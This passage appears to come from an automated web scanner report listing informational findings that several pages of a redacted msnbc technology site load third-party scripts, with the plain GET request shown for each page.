The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://widgets.twimg.com/j/2/widget.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /android HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.332. http://technolog.msnbc.redacted/angry-birds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/angry-birds

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /angry-birds HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.333. http://technolog.msnbc.redacted/app-store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/app-store

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /app-store HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.334. http://technolog.msnbc.redacted/apple previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/apple

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /apple HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.335. http://technolog.msnbc.redacted/apps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/apps

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /apps HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.336. http://technolog.msnbc.redacted/at previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/at

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://widgets.twimg.com/j/2/widget.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /at HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.337. http://technolog.msnbc.redacted/blackberry previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/blackberry

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /blackberry HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.338. http://technolog.msnbc.redacted/ces-2011 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/ces-2011

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://widgets.twimg.com/j/2/widget.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /ces-2011 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.339. http://technolog.msnbc.redacted/citizen-gamer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/citizen-gamer

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /citizen-gamer HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.340. http://technolog.msnbc.redacted/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/facebook

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /facebook HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.341. http://technolog.msnbc.redacted/featured previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/featured

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /featured HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.342. http://technolog.msnbc.redacted/google previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/google

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /google HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.343. http://technolog.msnbc.redacted/helen-a-s-popkin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/helen-a-s-popkin

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /helen-a-s-popkin HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.344. http://technolog.msnbc.redacted/internet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/internet

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /internet HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.345. http://technolog.msnbc.redacted/ipad previous next

Summary

Severity:	Information
